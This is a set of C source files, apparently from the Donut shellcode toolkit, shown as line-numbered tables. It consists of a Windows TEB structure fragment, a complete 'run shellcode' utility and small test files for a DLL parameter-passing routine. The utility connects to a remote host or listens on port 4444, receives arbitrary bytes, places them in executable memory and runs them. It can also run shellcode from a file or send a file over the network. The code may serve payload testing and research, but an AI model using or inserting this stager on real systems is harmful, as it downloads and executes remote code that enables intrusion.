239 | UCHAR SpareBytes[36]; | |
240 | #endif | |
241 | ULONG TxFsContext; | |
242 | ||
243 | GDI_TEB_BATCH GdiTebBatch; | |
244 | CLIENT_ID RealClientId; | |
245 | HANDLE GdiCachedProcessHandle; | |
246 | ULONG GdiClientPID; | |
247 | ULONG GdiClientTID; | |
248 | PVOID GdiThreadLocalInfo; | |
249 | ULONG_PTR Win32ClientInfo[62]; | |
250 | PVOID glDispatchTable[233]; | |
251 | ULONG_PTR glReserved1[29]; | |
252 | PVOID glReserved2; | |
253 | PVOID glSectionInfo; | |
254 | PVOID glSection; | |
255 | PVOID glTable; | |
256 | PVOID glCurrentRC; | |
257 | PVOID glContext; | |
258 | ||
259 | NTSTATUS LastStatusValue; | |
260 | UNICODE_STRING StaticUnicodeString; | |
261 | WCHAR StaticUnicodeBuffer[261]; | |
262 | ||
263 | PVOID DeallocationStack; | |
264 | PVOID TlsSlots[64]; | |
265 | LIST_ENTRY TlsLinks; | |
266 | ||
267 | PVOID Vdm; | |
268 | PVOID ReservedForNtRpc; | |
269 | PVOID DbgSsReserved[2]; | |
270 | ||
271 | ULONG HardErrorMode; | |
272 | #ifdef _M_X64 | |
273 | PVOID Instrumentation[11]; | |
274 | #else | |
275 | PVOID Instrumentation[9]; | |
276 | #endif | |
277 | GUID ActivityId; | |
278 | ||
279 | PVOID SubProcessTag; | |
280 | PVOID EtwLocalData; | |
281 | PVOID EtwTraceData; | |
282 | PVOID WinSockData; | |
283 | ULONG GdiBatchCount; | |
284 | ||
285 | union | |
286 | { | |
287 | PROCESSOR_NUMBER CurrentIdealProcessor; | |
288 | ULONG IdealProcessorValue; | |
289 | struct | |
290 | { | |
291 | UCHAR ReservedPad0; | |
292 | UCHAR ReservedPad1; | |
293 | UCHAR ReservedPad2; | |
294 | UCHAR IdealProcessor; | |
295 | }; | |
296 | }; | |
297 | ||
298 | ULONG GuaranteedStackBytes; | |
299 | PVOID ReservedForPerf; | |
300 | PVOID ReservedForOle; | |
301 | ULONG WaitingOnLoaderLock; | |
302 | PVOID SavedPriorityState; | |
303 | ULONG_PTR SoftPatchPtr1; | |
304 | PVOID ThreadPoolData; | |
305 | PVOID *TlsExpansionSlots; | |
306 | #ifdef _M_X64 | |
307 | PVOID DeallocationBStore; | |
308 | PVOID BStoreLimit; | |
309 | #endif | |
310 | ULONG MuiGeneration; | |
311 | ULONG IsImpersonating; | |
312 | PVOID NlsCache; | |
313 | PVOID pShimData; | |
314 | ULONG HeapVirtualAffinity; | |
315 | HANDLE CurrentTransactionHandle; | |
316 | PTEB_ACTIVE_FRAME ActiveFrame; | |
317 | PVOID FlsData; | |
318 | ||
319 | PVOID PreferredLanguages; | |
320 | PVOID UserPrefLanguages; | |
321 | PVOID MergedPrefLanguages; | |
322 | ULONG MuiImpersonation; | |
323 | ||
324 | union | |
325 | { | |
326 | USHORT CrossTebFlags; | |
327 | USHORT SpareCrossTebBits : 16; | |
328 | }; | |
329 | union | |
330 | { | |
331 | USHORT SameTebFlags; | |
332 | struct | |
333 | { | |
334 | USHORT SafeThunkCall : 1; | |
335 | USHORT InDebugPrint : 1; | |
336 | USHORT HasFiberData : 1; | |
337 | USHORT SkipThreadAttach : 1; | |
338 | USHORT WerInShipAssertCode : 1; | |
339 | USHORT RanProcessInit : 1; | |
340 | USHORT ClonedThread : 1; | |
341 | USHORT SuppressDebugMsg : 1; | |
342 | USHORT DisableUserStackWalk : 1; | |
343 | USHORT RtlExceptionAttached : 1; | |
344 | USHORT InitialThread : 1; | |
345 | USHORT SessionAware : 1; | |
346 | USHORT SpareSameTebBits : 4; | |
347 | }; | |
348 | }; | |
349 | ||
350 | PVOID TxnScopeEnterCallback; | |
351 | PVOID TxnScopeExitCallback; | |
352 | PVOID TxnScopeContext; | |
353 | ULONG LockCount; | |
354 | ULONG SpareUlong0; | |
355 | PVOID ResourceRetValue; | |
356 | PVOID ReservedForWdf; | |
357 | } TEB, *PTEB; | |
358 | ||
359 | #endif⏎ |
0 | ||
1 | /** | |
2 | Copyright © 2016-2019 Odzhan. All Rights Reserved. | |
3 | ||
4 | Redistribution and use in source and binary forms, with or without | |
5 | modification, are permitted provided that the following conditions are | |
6 | met: | |
7 | ||
8 | 1. Redistributions of source code must retain the above copyright | |
9 | notice, this list of conditions and the following disclaimer. | |
10 | ||
11 | 2. Redistributions in binary form must reproduce the above copyright | |
12 | notice, this list of conditions and the following disclaimer in the | |
13 | documentation and/or other materials provided with the distribution. | |
14 | ||
15 | 3. The name of the author may not be used to endorse or promote products | |
16 | derived from this software without specific prior written permission. | |
17 | ||
18 | THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR | |
19 | IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED | |
20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
21 | DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, | |
22 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES | |
23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
24 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) | |
25 | HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, | |
26 | STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN | |
27 | ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE | |
28 | POSSIBILITY OF SUCH DAMAGE. */ | |
29 | ||
30 | #if defined(_WIN32) || defined(_WIN64) | |
31 | #ifndef _WIN32_WINNT | |
32 | #define _WIN32_WINNT 0x0502 | |
33 | #endif | |
34 | #define WIN | |
35 | #ifndef _WINSOCKAPI_ | |
36 | #define _WINSOCKAPI_ | |
37 | #endif | |
38 | #include <windows.h> | |
39 | #include <shlwapi.h> | |
40 | #include <winsock2.h> | |
41 | #include <ws2tcpip.h> | |
42 | #define close closesocket | |
43 | #define SHUT_RDWR SD_BOTH | |
44 | #pragma comment(lib, "ws2_32.lib") | |
45 | #pragma comment(lib, "shlwapi.lib") | |
46 | #else | |
47 | #include <unistd.h> | |
48 | #include <sys/socket.h> | |
49 | #include <sys/types.h> | |
50 | #include <sys/mman.h> | |
51 | #include <arpa/inet.h> | |
52 | #include <netdb.h> | |
53 | #include <netinet/in.h> | |
54 | #include <sys/ioctl.h> | |
55 | #include <net/if.h> | |
56 | #include <signal.h> | |
57 | #include <fcntl.h> | |
58 | #endif | |
59 | ||
60 | #include <stdio.h> | |
61 | #include <stdint.h> | |
62 | #include <string.h> | |
63 | #include <stdlib.h> | |
64 | #include <time.h> | |
65 | #include <sys/stat.h> | |
66 | ||
67 | #define RSC_CLIENT 0 | |
68 | #define RSC_SERVER 1 | |
69 | #define RSC_EXEC 2 | |
70 | ||
71 | #define RSC_SEND 0 | |
72 | #define RSC_RECV 1 | |
73 | ||
74 | #define DEFAULT_PORT "4444" | |
75 | ||
76 | // structure for parameters | |
77 | typedef struct _args_t { | |
78 | int s, r; | |
79 | char *port, *address, *file; | |
80 | #ifdef WIN | |
81 | char *modules; | |
82 | #endif | |
83 | int port_nbr, ai_family, mode, sim, tx_mode, ai_addrlen, dbg; | |
84 | struct sockaddr *ai_addr; | |
85 | struct sockaddr_in v4; | |
86 | struct sockaddr_in6 v6; | |
87 | char ip[INET6_ADDRSTRLEN]; | |
88 | uint32_t code_len; | |
89 | void *code; | |
90 | } args_t; | |
91 | ||
92 | #ifdef WIN | |
93 | /**F*****************************************************************/ | |
94 | void xstrerror (char *fmt, ...) | |
95 | /** | |
96 | * PURPOSE : Display windows error | |
97 | * | |
98 | * RETURN : Nothing | |
99 | * | |
100 | * NOTES : None | |
101 | * | |
102 | *F*/ | |
103 | { | |
104 | char *error=NULL; | |
105 | va_list arglist; | |
106 | char buffer[2048]; | |
107 | DWORD dwError=GetLastError(); | |
108 | ||
109 | va_start (arglist, fmt); | |
110 | wvnsprintf (buffer, sizeof(buffer) - 1, fmt, arglist); | |
111 | va_end (arglist); | |
112 | ||
113 | if (FormatMessage ( | |
114 | FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM, | |
115 | NULL, dwError, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), | |
116 | (LPSTR)&error, 0, NULL)) | |
117 | { | |
118 | printf ("[ %s : %s\n", buffer, error); | |
119 | LocalFree (error); | |
120 | } else { | |
121 | printf ("[ %s : %i\n", buffer, dwError); | |
122 | } | |
123 | } | |
124 | #else | |
125 | #define xstrerror printf | |
126 | #endif | |
127 | ||
128 | char *addr2ip(args_t *p) | |
129 | { | |
130 | void *src; | |
131 | #ifdef WIN | |
132 | DWORD ip_size=INET6_ADDRSTRLEN; | |
133 | WSAAddressToString (p->ai_addr, p->ai_addrlen, | |
134 | NULL, (char*)p->ip, &ip_size); | |
135 | #else | |
136 | if (p->ai_family==AF_INET) { | |
137 | src=(void*)&p->v4.sin_addr; | |
138 | } else { | |
139 | src=(void*)&p->v6.sin6_addr; | |
140 | } | |
141 | inet_ntop(p->ai_family, src, p->ip, INET6_ADDRSTRLEN); | |
142 | #endif | |
143 | return p->ip; | |
144 | } | |
145 | ||
146 | int init_network (args_t *p) | |
147 | /** | |
148 | * PURPOSE : initialize winsock for windows, resolve network address | |
149 | * | |
150 | * RETURN : 1 for okay else 0 | |
151 | * | |
152 | * NOTES : None | |
153 | * | |
154 | *F*/ | |
155 | { | |
156 | struct addrinfo *list=NULL, *e=NULL; | |
157 | struct addrinfo hints; | |
158 | int r, t; | |
159 | ||
160 | // initialize winsock if windows | |
161 | #ifdef WIN | |
162 | WSADATA wsa; | |
163 | WSAStartup (MAKEWORD (2, 0), &wsa); | |
164 | #endif | |
165 | ||
166 | r=0; | |
167 | // set network address length to zero | |
168 | p->ai_addrlen = 0; | |
169 | ||
170 | // if no address supplied | |
171 | if (p->address==NULL) | |
172 | { | |
173 | // is it ipv4? | |
174 | if (p->ai_family==AF_INET) { | |
175 | p->v4.sin_family = AF_INET; | |
176 | p->v4.sin_port = htons((u_short)p->port_nbr); | |
177 | p->v4.sin_addr.s_addr = INADDR_ANY; | |
178 | p->ai_addr = (struct sockaddr*)&p->v4; | |
179 | p->ai_addrlen = sizeof (struct sockaddr_in); | |
180 | } else { | |
181 | // else it's ipv6 | |
182 | p->v6.sin6_family = AF_INET6; | |
183 | p->v6.sin6_port = htons((u_short)p->port_nbr); | |
184 | p->v6.sin6_addr = in6addr_any; | |
185 | p->ai_addr = (struct sockaddr*)&p->v6; | |
186 | p->ai_addrlen = sizeof (struct sockaddr_in6); | |
187 | } | |
188 | } else { | |
189 | memset (&hints, 0, sizeof (hints)); | |
190 | ||
191 | hints.ai_flags = AI_PASSIVE; | |
192 | hints.ai_family = p->ai_family; | |
193 | hints.ai_socktype = SOCK_STREAM; | |
194 | hints.ai_protocol = IPPROTO_TCP; | |
195 | ||
196 | // get all network addresses | |
197 | t=getaddrinfo (p->address, p->port, &hints, &list); | |
198 | if (t == 0) | |
199 | { | |
200 | for (e=list; e!=NULL; e=e->ai_next) | |
201 | { | |
202 | // copy to ipv4 structure | |
203 | if (p->ai_family==AF_INET) { | |
204 | memcpy (&p->v4, e->ai_addr, e->ai_addrlen); | |
205 | p->ai_addr = (struct sockaddr*)&p->v4; | |
206 | } else { | |
207 | // ipv6 structure | |
208 | memcpy (&p->v6, e->ai_addr, e->ai_addrlen); | |
209 | p->ai_addr = (struct sockaddr*)&p->v6; | |
210 | } | |
211 | // assign size of structure | |
212 | p->ai_addrlen = e->ai_addrlen; | |
213 | break; | |
214 | } | |
215 | freeaddrinfo (list); | |
216 | } else { | |
217 | xstrerror ("getaddrinfo"); | |
218 | } | |
219 | } | |
220 | return p->ai_addrlen; | |
221 | } | |
222 | ||
223 | void debug(void *bin) | |
224 | { | |
225 | // | |
226 | //__builtin_trap(); | |
227 | //raise(SIGTRAP); | |
228 | } | |
229 | ||
230 | // allocate read/write and executable memory | |
231 | // copy data from p->code and execute | |
232 | void xcode(args_t *p) | |
233 | { | |
234 | void *bin; | |
235 | int i; | |
236 | int fd[2048]; | |
237 | ||
238 | if (p->code_len == 0) { | |
239 | printf("[ no code to execute.\n"); | |
240 | return; | |
241 | } | |
242 | printf ("[ executing code..."); | |
243 | ||
244 | #ifdef WIN | |
245 | bin=VirtualAlloc (0, p->code_len, | |
246 | MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); | |
247 | #else | |
248 | bin=mmap (0, p->code_len, | |
249 | PROT_EXEC | PROT_WRITE | PROT_READ, | |
250 | MAP_ANON | MAP_PRIVATE, -1, 0); | |
251 | #endif | |
252 | if (bin!=NULL) | |
253 | { | |
254 | memcpy (bin, p->code, p->code_len); | |
255 | // create file/socket descriptors to simulate real system | |
256 | // created interesting results on openbsd with limits | |
257 | // to how many files could be open at once.. | |
258 | // | |
259 | if (p->sim) { | |
260 | #ifndef WIN | |
261 | for (i=0; i<p->sim && p->sim<2048; i++) { | |
262 | fd[i]=socket(AF_INET, SOCK_STREAM, IPPROTO_IP); | |
263 | } | |
264 | #else | |
265 | // todo | |
266 | for (i=0; i<p->sim && p->sim<2048; i++) { | |
267 | } | |
268 | #endif | |
269 | } | |
270 | ||
271 | // debug the code? | |
272 | if (p->dbg) { | |
273 | #if defined(_WIN32) || defined(_WIN64) | |
274 | DebugBreak(); | |
275 | #else | |
276 | raise(SIGTRAP); | |
277 | #endif | |
278 | } | |
279 | // execute | |
280 | ((void(*)())bin)(); | |
281 | printf("OK!\n"); | |
282 | if (p->sim) { | |
283 | #ifndef WIN | |
284 | // close all descriptors | |
285 | for (i=0; i<p->sim && p->sim<2048; i++) { | |
286 | close(fd[i]); | |
287 | } | |
288 | #else | |
289 | // todo | |
290 | #endif | |
291 | } | |
292 | #ifdef WIN | |
293 | VirtualFree (bin, 0, MEM_RELEASE | MEM_DECOMMIT); | |
294 | #else | |
295 | munmap (bin, p->code_len); | |
296 | #endif | |
297 | } | |
298 | } | |
299 | ||
300 | void send_data(args_t *p, int s) { | |
301 | FILE *fd; | |
302 | int outlen, len, opt; | |
303 | uint32_t sum; | |
304 | uint8_t buf[BUFSIZ]; | |
305 | ||
306 | // open file for read in binary mode | |
307 | printf ("[ opening %s for read\n", p->file); | |
308 | fd = fopen(p->file, "rb"); | |
309 | ||
310 | if (fd != NULL) | |
311 | { | |
312 | // send contents of file | |
313 | printf ("[ sending data\n"); | |
314 | for (;;) { | |
315 | // read block | |
316 | outlen = fread(buf, sizeof(uint8_t), BUFSIZ, fd); | |
317 | // zero or less indicates EOF | |
318 | if (outlen <= 0) break; | |
319 | // send contents | |
320 | for (sum=0; sum<outlen; sum += len) { | |
321 | len=send (s, &buf[sum], outlen - sum, 0); | |
322 | if (len <= 0) break; | |
323 | } | |
324 | p->code_len += sum; | |
325 | if (outlen != sum) break; | |
326 | } | |
327 | printf ("[ sent %i bytes\n", p->code_len); | |
328 | fclose(fd); | |
329 | } | |
330 | } | |
331 | ||
332 | void recv_data(args_t *p, int s) { | |
333 | int opt, r; | |
334 | fd_set fds; | |
335 | struct timeval tv; | |
336 | void *pv; | |
337 | ||
338 | p->code_len = 0; | |
339 | p->code = malloc(BUFSIZ); | |
340 | ||
341 | // set to non-blocking mode | |
342 | #ifdef WIN | |
343 | opt=1; | |
344 | ioctlsocket (s, FIONBIO, (u_long*)&opt); | |
345 | #else | |
346 | opt=fcntl(s, F_GETFL, 0); | |
347 | fcntl(s, F_SETFL, opt | O_NONBLOCK); | |
348 | #endif | |
349 | // keep reading until remote disconnects or we run out of memory | |
350 | printf ("[ receiving data\n"); | |
351 | ||
352 | for (;;) { | |
353 | FD_ZERO(&fds); | |
354 | FD_SET(s, &fds); | |
355 | ||
356 | tv.tv_sec = 5; | |
357 | tv.tv_usec = 0; | |
358 | r = select(FD_SETSIZE, &fds, 0, 0, &tv); | |
359 | ||
360 | if (r <= 0) { | |
361 | printf ("[ waiting for data timed out or failed\n"); | |
362 | break; | |
363 | } | |
364 | // receive a block | |
365 | r = recv(s, (uint8_t*)p->code + p->code_len, BUFSIZ, 0); | |
366 | if (r <= 0) break; | |
367 | p->code_len += r; | |
368 | // resize buffer | |
369 | pv = realloc(p->code, p->code_len + BUFSIZ); | |
370 | // on error, free pointer | |
371 | if(pv == NULL) { | |
372 | p->code_len = 0; | |
373 | free(p->code); | |
374 | p->code = NULL; | |
375 | printf("[ error: out of memory.\n"); | |
376 | break; | |
377 | } | |
378 | p->code = pv; | |
379 | } | |
380 | if(p->code_len != 0) { | |
381 | printf ("[ received %i bytes\n", p->code_len); | |
382 | } | |
383 | } | |
384 | ||
385 | // | |
386 | int ssr (args_t *p) | |
387 | /** | |
388 | * PURPOSE : send a shellcode or receive one from remote system and execute it | |
389 | * | |
390 | * RETURN : 0 or length of shellcode sent/received | |
391 | * | |
392 | * NOTES : None | |
393 | * | |
394 | *F*/ | |
395 | { | |
396 | int s, opt, r, t; | |
397 | fd_set fds; | |
398 | struct timeval tv; | |
399 | ||
400 | p->code_len=0; | |
401 | ||
402 | // create socket | |
403 | printf ("[ creating socket\n"); | |
404 | s = socket(p->ai_family, SOCK_STREAM, IPPROTO_TCP); | |
405 | if (s < 0) return 0; | |
406 | ||
407 | // ensure we can reuse socket | |
408 | t=1; | |
409 | setsockopt (s, SOL_SOCKET, SO_REUSEADDR, (char*)&t, sizeof (t)); | |
410 | ||
411 | // bind to port | |
412 | printf ("[ binding to port %s\n", p->port); | |
413 | r = bind(s, p->ai_addr, p->ai_addrlen); | |
414 | if (r == 0) { | |
415 | // listen | |
416 | r = listen (s, 1); | |
417 | if (r == 0) { | |
418 | printf ("[ waiting for connections on %s\n", addr2ip(p)); | |
419 | if (r == 0) { | |
420 | t = accept(s, p->ai_addr, &p->ai_addrlen); | |
421 | printf ("[ accepting connection from %s\n", addr2ip(p)); | |
422 | if (t > 0) { | |
423 | if (p->tx_mode == RSC_SEND) { | |
424 | send_data(p, t); | |
425 | } else { | |
426 | recv_data(p, t); | |
427 | xcode(p); | |
428 | } | |
429 | } | |
430 | } | |
431 | // close socket to peer | |
432 | shutdown(t, SHUT_RDWR); | |
433 | close(t); | |
434 | } else { | |
435 | perror("listen"); | |
436 | } | |
437 | } else { | |
438 | perror("bind"); | |
439 | } | |
440 | // close listening socket | |
441 | shutdown(s, SHUT_RDWR); | |
442 | close(s); | |
443 | ||
444 | return p->code_len; | |
445 | } | |
446 | ||
447 | /**F*****************************************************************/ | |
448 | int csr (args_t *p) | |
449 | /** | |
450 | * PURPOSE : opens connection to remote system and sends shellcode | |
451 | * | |
452 | * RETURN : 0 or 1 | |
453 | * | |
454 | * NOTES : None | |
455 | * | |
456 | *F*/ | |
457 | { | |
458 | int s, r, opt; | |
459 | fd_set fds; | |
460 | struct timeval tv; | |
461 | ||
462 | printf ("[ creating socket\n"); | |
463 | s = socket(p->ai_family, SOCK_STREAM, IPPROTO_TCP); | |
464 | if (s < 0) return 0; | |
465 | ||
466 | // try connect to remote | |
467 | printf ("[ connecting to %s\n", addr2ip(p)); | |
468 | r = connect(s, p->ai_addr, p->ai_addrlen); | |
469 | ||
470 | if (r == 0) { | |
471 | if (p->tx_mode==RSC_SEND) { | |
472 | send_data(p, s); | |
473 | } else { | |
474 | recv_data(p, s); | |
475 | xcode(p); | |
476 | } | |
477 | } else { | |
478 | xstrerror("connect"); | |
479 | } | |
480 | printf ("[ closing connection\n"); | |
481 | shutdown(s, SHUT_RDWR); | |
482 | close(s); | |
483 | return 1; | |
484 | } | |
485 | ||
486 | /**F*****************************************************************/ | |
487 | void xfile(args_t *p) | |
488 | /** | |
489 | * PURPOSE : read contents of shellcode and attempt to execute it locally | |
490 | * | |
491 | * RETURN : Nothing | |
492 | * | |
493 | * NOTES : None | |
494 | * | |
495 | *F*/ | |
496 | { | |
497 | FILE *fd; | |
498 | int len; | |
499 | void *pv; | |
500 | ||
501 | p->code_len = 0; | |
502 | p->code = NULL; | |
503 | ||
504 | printf ("[ reading code from %s\n", p->file); | |
505 | fd = fopen(p->file, "rb"); | |
506 | ||
507 | if (fd == NULL) { | |
508 | xstrerror("fopen(\"%s\")", p->file); | |
509 | return; | |
510 | } | |
511 | // read contents of file | |
512 | for (;;) { | |
513 | // first loop? allocate block | |
514 | if(p->code == NULL) { | |
515 | p->code = malloc(BUFSIZ); | |
516 | } | |
517 | // read a block of data | |
518 | len = fread((uint8_t*)p->code + p->code_len, sizeof(uint8_t), BUFSIZ, fd); | |
519 | if (len <= 0) break; | |
520 | p->code_len += len; | |
521 | // resize buffer for next read | |
522 | pv = realloc(p->code, p->code_len + BUFSIZ); | |
523 | ||
524 | if(pv == NULL) { | |
525 | p->code_len = 0; | |
526 | free(p->code); | |
527 | p->code = NULL; | |
528 | printf("[ error: out of memory!.\n"); | |
529 | break; | |
530 | } | |
531 | p->code = pv; | |
532 | } | |
533 | fclose(fd); | |
534 | ||
535 | if(p->code_len != 0) { | |
536 | xcode(p); | |
537 | } | |
538 | } | |
539 | ||
540 | #ifdef WIN | |
541 | void load_modules(char *names) { | |
542 | HMODULE mod; | |
543 | char *p = strtok(names, ";,"); | |
544 | ||
545 | while (p != NULL) { | |
546 | printf ("[ loading %s...", p); | |
547 | mod = LoadLibrary(p); | |
548 | ||
549 | printf ("%s\n", mod==NULL ? "FAILED" : "OK"); | |
550 | ||
551 | p = strtok(NULL, ";,"); | |
552 | } | |
553 | } | |
554 | #endif | |
555 | ||
556 | /**F*****************************************************************/ | |
557 | void usage (void) { | |
558 | printf ("\n usage: runsc <address> [options]\n"); | |
559 | printf ("\n -4 Use IP version 4 (default)"); | |
560 | printf ("\n -6 Use IP version 6"); | |
561 | printf ("\n -l Listen mode (required when listening on specific interface)"); | |
562 | #ifdef WIN | |
563 | printf ("\n -m <dll> Loads DLL modules. Each one separated by comma or semi-colon"); | |
564 | #endif | |
565 | printf ("\n -f <file> Read PIC from <file>"); | |
566 | printf ("\n -s <count> Simulate real process by creating file descriptors"); | |
567 | printf ("\n -p <number> Port number to use (default is %s)", DEFAULT_PORT); | |
568 | printf ("\n -x Execute PIC (requires -f)"); | |
569 | printf ("\n\n Press any key to continue . . ."); | |
570 | getchar (); | |
571 | ||
572 | exit (0); | |
573 | } | |
574 | ||
575 | /**F*****************************************************************/ | |
576 | char* getparam (int argc, char *argv[], int *i) { | |
577 | int n=*i; | |
578 | if (argv[n][2] != 0) { | |
579 | return &argv[n][2]; | |
580 | } | |
581 | if ((n+1) < argc) { | |
582 | *i=n+1; | |
583 | return argv[n+1]; | |
584 | } | |
585 | printf ("[ %c%c requires parameter\n", argv[n][0], argv[n][1]); | |
586 | exit (0); | |
587 | } | |
588 | ||
589 | void parse_args (args_t *p, int argc, char *argv[]) { | |
590 | int i; | |
591 | char opt; | |
592 | ||
593 | // for each argument | |
594 | for (i=1; i<argc; i++) | |
595 | { | |
596 | // is this option? | |
597 | if (argv[i][0]=='-' || argv[i][1]=='/') | |
598 | { | |
599 | // get option value | |
600 | opt=argv[i][1]; | |
601 | switch (opt) | |
602 | { | |
603 | case '4': | |
604 | p->ai_family=AF_INET; | |
605 | break; | |
606 | case '6': // use ipv6 (default is ipv4) | |
607 | p->ai_family=AF_INET6; | |
608 | break; | |
609 | case 'x': // execute PIC, requires -f | |
610 | p->mode=RSC_EXEC; | |
611 | break; | |
612 | case 'd': // debug the code | |
613 | p->dbg=1; | |
614 | break; | |
615 | case 'f': // file | |
616 | p->file=getparam(argc, argv, &i); | |
617 | break; | |
618 | case 'l': // listen for incoming connections | |
619 | p->mode=RSC_SERVER; | |
620 | break; | |
621 | #ifdef WIN | |
622 | case 'm': // windows only, loads modules required by shellcode | |
623 | p->modules = getparam(argc, argv, &i); | |
624 | break; | |
625 | #endif | |
626 | case 's': // create file descriptors before execution | |
627 | p->sim=atoi(getparam(argc, argv, &i)); | |
628 | break; | |
629 | case 'p': // port number | |
630 | p->port=getparam(argc, argv, &i); | |
631 | p->port_nbr=atoi(p->port); | |
632 | break; | |
633 | case '?': // display usage | |
634 | case 'h': | |
635 | usage (); | |
636 | break; | |
637 | default: | |
638 | printf ("[ unknown option %c\n", opt); | |
639 | usage(); | |
640 | break; | |
641 | } | |
642 | } else { | |
643 | // assume it's hostname or ip | |
644 | p->address=argv[i]; | |
645 | p->mode=RSC_CLIENT; | |
646 | } | |
647 | } | |
648 | } | |
649 | ||
650 | int main (int argc, char *argv[]) { | |
651 | args_t args; | |
652 | struct stat st; | |
653 | ||
654 | #ifdef WIN | |
655 | // | |
656 | PVOID OldValue=NULL; | |
657 | WSADATA wsa; | |
658 | ||
659 | //Wow64DisableWow64FsRedirection (&OldValue); | |
660 | LoadLibrary("ws2_32"); | |
661 | LoadLibrary("advapi32"); | |
662 | ||
663 | WSAStartup(MAKEWORD(2,0), &wsa); | |
664 | #endif | |
665 | ||
666 | setbuf(stdout, NULL); | |
667 | setbuf(stderr, NULL); | |
668 | ||
669 | memset (&args, 0, sizeof(args)); | |
670 | ||
671 | // set default parameters | |
672 | args.address = NULL; | |
673 | args.file = NULL; | |
674 | args.ai_family = AF_INET; | |
675 | args.port = DEFAULT_PORT; | |
676 | args.port_nbr = atoi(args.port); | |
677 | args.mode = -1; | |
678 | args.tx_mode = -1; | |
679 | args.sim = 0; | |
680 | args.dbg = 0; | |
681 | ||
682 | printf ("\n[ run shellcode v0.2\n"); | |
683 | ||
684 | parse_args(&args, argc, argv); | |
685 | ||
686 | // check if we have file parameter and it accessible | |
687 | if (args.file!=NULL) { | |
688 | if (stat (args.file, &st)) { | |
689 | printf ("[ unable to access %s\n", args.file); | |
690 | return 0; | |
691 | } | |
692 | } | |
693 | ||
694 | #ifdef WIN | |
695 | if (args.modules != NULL) { | |
696 | load_modules(args.modules); | |
697 | } | |
698 | #endif | |
699 | // if mode is executing | |
700 | if (args.mode == RSC_EXEC) { | |
701 | if (args.file != NULL) { | |
702 | xfile(&args); | |
703 | return 0; | |
704 | } else { | |
705 | printf ("\n[ you've used -x without supplying file with -f"); | |
706 | return 0; | |
707 | } | |
708 | } | |
709 | if (init_network(&args)) { | |
710 | // if no file specified, we receive and execute data | |
711 | args.tx_mode = (args.file==NULL) ? RSC_RECV : RSC_SEND; | |
712 | ||
713 | // if mode is -1, we listen for incoming connections | |
714 | if (args.mode == -1) { | |
715 | args.mode=RSC_SERVER; | |
716 | } | |
717 | ||
718 | // if no file specified, set to receive one | |
719 | if (args.tx_mode == -1) { | |
720 | args.tx_mode = RSC_RECV; | |
721 | } | |
722 | ||
723 | if (args.mode == RSC_SERVER) { | |
724 | ssr (&args); | |
725 | } else { | |
726 | csr (&args); | |
727 | } | |
728 | } | |
729 | if(args.code_len != 0) { | |
730 | free(args.code); | |
731 | } | |
732 | return 0; | |
733 | } |
0 | ||
1 | #define UNICODE | |
2 | #include <windows.h> | |
3 | ||
4 | #include "donut.h" | |
5 | #pragma comment(lib, "user32.lib") | |
6 | ||
7 | void call_api(FARPROC api, int param_cnt, WCHAR param[DONUT_MAX_PARAM][DONUT_MAX_NAME]); | |
8 | typedef VOID (WINAPI *_DonutApiW)(PWCHAR,PWCHAR,PWCHAR,PWCHAR); | |
9 | ||
10 | int main(void) { | |
11 | HMODULE m; | |
12 | _DonutApiW DonutApiW; | |
13 | WCHAR param[4][DONUT_MAX_NAME]={L"arg0",L"arg1",L"arg2",L"arg3"}; | |
14 | ||
15 | WCHAR msg[4096]; | |
16 | ||
17 | _snwprintf(msg, ARRAYSIZE(msg), | |
18 | L"param[0] : %ws\r" | |
19 | L"param[1] : %ws\r" | |
20 | L"param[2] : %ws\r" | |
21 | L"param[3] : %ws\r", | |
22 | param[0], param[1], param[2], param[3]); | |
23 | ||
24 | MessageBox(NULL, msg, L"Donut Test", MB_OK); | |
25 | ||
26 | m = LoadLibrary(L"call_api_dll.dll"); | |
27 | ||
28 | if(m != NULL) { | |
29 | DonutApiW = (_DonutApiW)GetProcAddress(m, "DonutApiW"); | |
30 | if(DonutApiW != NULL) { | |
31 | call_api((FARPROC)DonutApiW, 4, param); | |
32 | } | |
33 | } | |
34 | return 0; | |
35 | } | |
36 |
0 | #define WIN32_LEAN_AND_MEAN | |
1 | #define UNICODE | |
2 | ||
3 | #include <windows.h> | |
4 | #include "donut.h" | |
5 | ||
6 | #pragma comment(lib, "user32.lib") | |
7 | ||
8 | __declspec(dllexport) | |
9 | VOID APIENTRY DonutApiW(PWCHAR arg0, PWCHAR arg1, PWCHAR arg2, PWCHAR arg3) { | |
10 | WCHAR msg[4096]; | |
11 | ||
12 | _snwprintf(msg, ARRAYSIZE(msg), | |
13 | L"param[0] : %s\r" | |
14 | L"param[1] : %s\r" | |
15 | L"param[2] : %s\r" | |
16 | L"param[3] : %s\r", | |
17 | arg0, arg1, arg2, arg3); | |
18 | ||
19 | MessageBox(NULL, msg, L"Donut Test", MB_OK); | |
20 | } | |
21 | ||
22 | __declspec(dllexport) | |
23 | BOOL APIENTRY DllMain(HMODULE hModule, | |
24 | DWORD ul_reason_for_call, | |
25 | LPVOID lpReserved) { | |
26 | switch (ul_reason_for_call) { | |
27 | case DLL_PROCESS_ATTACH: | |
28 | case DLL_THREAD_ATTACH: | |
29 | case DLL_THREAD_DETACH: | |
30 | case DLL_PROCESS_DETACH: | |
31 | break; | |
32 | } | |
33 | return TRUE; | |
34 | } |
0 | #define UNICODE | |
1 | ||
2 | #include <stdint.h> | |
3 | #include <stdio.h> | |
4 | #include <stdlib.h> | |
5 | #include <string.h> | |
6 | #include <sys/stat.h> | |
